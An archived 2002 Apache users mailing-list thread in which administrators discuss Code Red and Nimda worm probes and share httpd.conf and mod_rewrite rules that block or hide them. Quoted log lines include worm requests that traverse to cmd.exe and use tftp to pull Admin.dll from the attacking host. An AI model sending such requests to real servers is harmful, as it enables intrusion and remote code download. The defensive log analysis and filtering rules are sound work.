> >To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> >For additional commands, e-mail: users-help@httpd.apache.org
> >
>
> --
> -== HonesT Is The BesT PoLicY ==-
> -----------------
>
>
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Erwien Samantha Y <er...@netscape.net>.
add this in httpd.conf
##############################################
##### Remove IIS worm From LOG ###############
#############################################
SetEnvIfNoCase Request_URI "^/scripts/" nolog
SetEnvIfNoCase Request_URI "^/msadc/" nolog
SetEnvIfNoCase Request_URI "^/MSADC/" nolog
SetEnvIfNoCase Request_URI "^/_vti_bin/" nolog
SetEnvIfNoCase Request_URI "^/_mem_bin/" nolog
SetEnvIfNoCase Request_URI "^/c/winnt/" nolog
SetEnvIfNoCase Request_URI "^/d/winnt/" nolog
SetEnvIfNoCase Request_URI "^/default.ida" nolog
Redirect gone /scripts/
Redirect gone /msadc/
Redirect gone /MSADC/
Redirect gone /_vti_bin/
Redirect gone /_mem_bin/
Redirect gone /c/winnt/
Redirect gone /d/winnt/
Redirect gone /default.ida
CustomLog /www/logs/access_log combined env=!nolog
regards,
wIEn.
alexblundell@btinternet.com wrote:
>I have a;so had the same problem, On my first box it started in January and
>apeares every 10 minutes in my logs. AND on my new box that has only been up
>a few weeks its in my logs about 4 times?
>
>[Wed Feb 27 13:21:18 2002] [error] [client 216.12.204.122] File does not
>exist: /var/www/html/MSADC/root.exe
>[Wed Feb 27 13:21:24 2002] [error] [client 216.12.204.122] File does not
>exist: /var/www/html/c/winnt/system32/cmd.exe
>
>Can anyone explain this???
>AJ
>
>----- Original Message -----
>From: "Bill -OSX- Jones" <sn...@mac.com>
>To: <us...@httpd.apache.org>
>Sent: Thursday, February 28, 2002 11:32 PM
>Subject: Re: Code Red 2 attack
>
>
>>busy - but I do know about the problem - anyhow, I apologize, I
>>didn't intend to imply this isn't a problem for some Apache admins.
>>
>>On Thursday, February 28, 2002, at 06:06 PM, Frank Reichenbacher wrote:
>>
>>>Where have you been?
>>>
>>>My logs are full of probes from both the Nimda and Code Red worms
>>>and have
>>>been ever since they hit the streets last fall. I get hit every
>>>few seconds
>>>by infected computers on my ISP's network. These servers have been
>>>infected
>>>for many months and their admins are doing nothing about it.
>>>
>>
>>But as I don't do Windows, I guess I never really cared. So, to me,
>>it is really an issue of how fast can I ignore those requests...
>>_Sx____________________
>> ('> -Sx- IUDICIUM
>> //\ Have Computer -
>> v_/_ Will Hack...
>>
>>
>>---------------------------------------------------------------------
>>The official User-To-User support forum of the Apache HTTP Server Project.
>>See <URL:http://httpd.apache.org/userslist.html> for more info.
>>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>>For additional commands, e-mail: users-help@httpd.apache.org
>>
>
>
>---------------------------------------------------------------------
>The official User-To-User support forum of the Apache HTTP Server Project.
>See <URL:http://httpd.apache.org/userslist.html> for more info.
>To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>For additional commands, e-mail: users-help@httpd.apache.org
>
--
-== HonesT Is The BesT PoLicY ==-
-----------------
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Bill -OSX- Jones <sn...@mac.com>.
The infected system wants to infect your's - nothing to explain.
On Friday, March 1, 2002, at 03:40 AM, Alex Blundell ((aj)) wrote:
> Can anyone explain this???
> AJ
>
_Sx____________________
('> -Sx- IUDICIUM
//\ Have Computer -
v_/_ Will Hack...
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by "Alex Blundell (aj)" <al...@btinternet.com>.
I have a;so had the same problem, On my first box it started in January and
apeares every 10 minutes in my logs. AND on my new box that has only been up
a few weeks its in my logs about 4 times?
[Wed Feb 27 13:21:18 2002] [error] [client 216.12.204.122] File does not
exist: /var/www/html/MSADC/root.exe
[Wed Feb 27 13:21:24 2002] [error] [client 216.12.204.122] File does not
exist: /var/www/html/c/winnt/system32/cmd.exe
Can anyone explain this???
AJ
----- Original Message -----
From: "Bill -OSX- Jones" <sn...@mac.com>
To: <us...@httpd.apache.org>
Sent: Thursday, February 28, 2002 11:32 PM
Subject: Re: Code Red 2 attack
> busy - but I do know about the problem - anyhow, I apologize, I
> didn't intend to imply this isn't a problem for some Apache admins.
>
> On Thursday, February 28, 2002, at 06:06 PM, Frank Reichenbacher wrote:
>
> > Where have you been?
> >
> > My logs are full of probes from both the Nimda and Code Red worms
> > and have
> > been ever since they hit the streets last fall. I get hit every
> > few seconds
> > by infected computers on my ISP's network. These servers have been
> > infected
> > for many months and their admins are doing nothing about it.
> >
>
>
> But as I don't do Windows, I guess I never really cared. So, to me,
> it is really an issue of how fast can I ignore those requests...
> _Sx____________________
> ('> -Sx- IUDICIUM
> //\ Have Computer -
> v_/_ Will Hack...
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Jim Hribnak <hr...@nucleus.com>.
It still boggles my mind that people are still getting infected with this
Worm. I run a Nimda troll that willdo an auto email to the IP Netblock
owner.. Even still it goes on and on and on. Since Oct 25 2001 till today
(Mar 4 2002) I have sent out (automatically) close to 4,100 complaints with
machines hitting our servers looking for Winblows machines that could be
infected.
Here is the URL (I did not write this)
http://www.digitalcon.ca/nimda/
Its a pretty good CGI, you no longer have to manually file your complaints.
----- Original Message -----
From: "Bill -OSX- Jones" <sn...@mac.com>
To: <us...@httpd.apache.org>
Sent: Thursday, February 28, 2002 4:45 PM
Subject: Re: Code Red 2 attack
> Please ignore my last inquiry, the following does what I want for
> the time being:
>
> # Check for Code Red IIS/Windows Hacking non-sense...
> RewriteCond %{REQUEST_FILENAME} /winnt/ [NC,OR]
> RewriteCond %{REQUEST_FILENAME} /system32/ [NC,OR]
> RewriteCond %{REQUEST_FILENAME} \.ida.*$ [NC,OR]
> RewriteCond %{REQUEST_FILENAME} \.exe.*$ [NC,OR]
> RewriteCond %{REQUEST_FILENAME} \.com.*$ [NC,OR]
> RewriteCond %{REQUEST_FILENAME} \.dll.*$ [NC]
> RewriteRule ^.*$ http://insecurity.org/403.shtml [L]
> # RewriteRule ^.*$ http://insecurity.org/notwindows.html [L]
>
>
> Thx :]
> _Sx____________________
> ('> -Sx- IUDICIUM
> //\ Have Computer -
> v_/_ Will Hack...
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Bill -OSX- Jones <sn...@mac.com>.
Please ignore my last inquiry, the following does what I want for
the time being:
# Check for Code Red IIS/Windows Hacking non-sense...
RewriteCond %{REQUEST_FILENAME} /winnt/ [NC,OR]
RewriteCond %{REQUEST_FILENAME} /system32/ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.ida.*$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.exe.*$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.com.*$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.dll.*$ [NC]
RewriteRule ^.*$ http://insecurity.org/403.shtml [L]
# RewriteRule ^.*$ http://insecurity.org/notwindows.html [L]
Thx :]
_Sx____________________
('> -Sx- IUDICIUM
//\ Have Computer -
v_/_ Will Hack...
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Bill -OSX- Jones <sn...@mac.com>.
busy - but I do know about the problem - anyhow, I apologize, I
didn't intend to imply this isn't a problem for some Apache admins.
On Thursday, February 28, 2002, at 06:06 PM, Frank Reichenbacher wrote:
> Where have you been?
>
> My logs are full of probes from both the Nimda and Code Red worms
> and have
> been ever since they hit the streets last fall. I get hit every
> few seconds
> by infected computers on my ISP's network. These servers have been
> infected
> for many months and their admins are doing nothing about it.
>
But as I don't do Windows, I guess I never really cared. So, to me,
it is really an issue of how fast can I ignore those requests...
_Sx____________________
('> -Sx- IUDICIUM
//\ Have Computer -
v_/_ Will Hack...
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Frank Reichenbacher <fr...@mollynet.com>.
Where have you been?
My logs are full of probes from both the Nimda and Code Red worms and have
been ever since they hit the streets last fall. I get hit every few seconds
by infected computers on my ISP's network. These servers have been infected
for many months and their admins are doing nothing about it.
Frank
----- Original Message -----
From: "Bill -OSX- Jones" <sn...@mac.com>
To: <us...@httpd.apache.org>
Sent: Thursday, February 28, 2002 4:06 PM
Subject: Re: Code Red 2 attack
> um, no ... Are you on Windows?
>
> On Thursday, February 28, 2002, at 05:39 PM, Eduardo Gomez wrote:
> >
> > Does this mean someone may have successfully hacked me through this
> > malformed header attack?
> > Is it normal to find so much binary code in the error log?
> >
>
> ???
> _Sx____________________
> ('> -Sx- IUDICIUM
> //\ Have Computer -
> v_/_ Will Hack...
>
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Bill -Sx- Jones <sn...@mac.com>.
On 3/2/02 2:50 AM, "Eduardo Gomez" <in...@yahoo.com> wrote:
> brought Commodore down, I'd probably still be an Amiga user.
Amgiga - they still have coolness.
-Sx- :]
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Eduardo Gomez <in...@yahoo.com>.
> > what I got in my error log was a bunch
> > of binary
> > code which after examined in an hex editor showed to be related to
> > modems
> Are you on Windows? RU running (walking) with Apache on Windows?
> Sorry, but I just want to know.
U mean crawling on windows? yeah... But if the Wintel mafia wouldn't have
brought Commodore down, I'd probably still be an Amiga user.
_____________________
Eduardo Gomez
Innerlab Productions
info@innerlab.com
www.innerlab.com
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Bill -OSX- Jones <sn...@mac.com>.
Again I ask -
On Friday, March 1, 2002, at 07:41 AM, Eduardo Gomez wrote:
> The error logs which have been mentioned so far in this thread, like:
>
>> 207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET
>> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%
>
> I know they are Nimda, and it is my understanding that apache is not
> vulnerable to these. Now, what I got in my error log was a bunch
> of binary
> code which after examined in an hex editor showed to be related to
> modems
> ...
Are you on Windows? RU running (walking) with Apache on Windows?
Sorry, but I just want to know.
_Sx____________________
('> -Sx- IUDICIUM
//\ Have Computer -
v_/_ Will Hack...
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Eduardo Gomez <in...@yahoo.com>.
I started this particular thread, and by the way, I am new to web servers in
general,
and I have no clue about the scripting used by apache, which I assume is
Unix or something like that. I'm using Apache on Windows. Now that you have
been made aware of my ignorance, I'd like to add something:
The error logs which have been mentioned so far in this thread, like:
> 207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%
I know they are Nimda, and it is my understanding that apache is not
vulnerable to these. Now, what I got in my error log was a bunch of binary
code which after examined in an hex editor showed to be related to modems
drivers, audio control, and other stuff. After 15kb the whole code seems
that was rejected as a malformed header by apache. I am very curious to
know what this was, if it's common to find such code in the error log (as
opposed to strings like the one quoted above) and if it means the
(successful?) attempt to introduce and activate an executable in my machine.
If soemone wants to examine the binary code I found, I would happily email
it. Thanks in advance.
_____________________
Eduardo Gomez
Innerlab Productions
info@innerlab.com
www.innerlab.com
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Bill -OSX- Jones <sn...@mac.com>.
Here's an example -
207.86.144.105 - - [28/Feb/2002:02:38:32 -0500] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 200 1942 "-" "-"
... 72 practically identical lines deleted ...
207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20207.86.144.105%20GET%20Admin.
dll%20d:\Admin.dll HTTP/1.0" 200 2104 "-" "-"
207.86.144.105 - - [28/Feb/2002:02:38:39 -0500] "GET
/scripts/..%252f../Admin.dll HTTP/1.0" 200 1950 "-" "-"
...
But I still feel warm and snuggly inside :)
Anyhow, earlier I posted a mod_rewrite question that went by
somewhat unnoticed, so please allow me to try once more -- then if
no one responds I will go back into my semi-annual hibernation :)
I want to test for
RewriteCond %{REQUEST_FILENAME} \.ida.+$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.com.+$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.exe.+$ [NC,OR]
RewriteCond %{REQUEST_FILENAME} \.dll.+$ [NC]
RewriteRule ^.*$ http://insecurity.org/403.shtml [L]
Which apparently works, but it seems that this typical section of
the CR2 request: /..%252f../ as denoted within -
207.86.144.105 - - [28/Feb/2002:02:38:36 -0500] "GET
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20207.86.144.105%20GET%20Admin.
dll%20d:\Admin.dll HTTP/1.0" 200 2104 "-" "-"
is somehow causing the match to fail and not match.
Any thoughts?
_Sx____________________
('> -Sx- IUDICIUM
//\ Have Computer -
v_/_ Will Hack...
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: Code Red 2 attack
Posted by Bill -OSX- Jones <sn...@mac.com>.
um, no ... Are you on Windows?
On Thursday, February 28, 2002, at 05:39 PM, Eduardo Gomez wrote:
>
> Does this mean someone may have successfully hacked me through this
> malformed header attack?
> Is it normal to find so much binary code in the error log?
>
???
_Sx____________________
('> -Sx- IUDICIUM
//\ Have Computer -
v_/_ Will Hack...
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org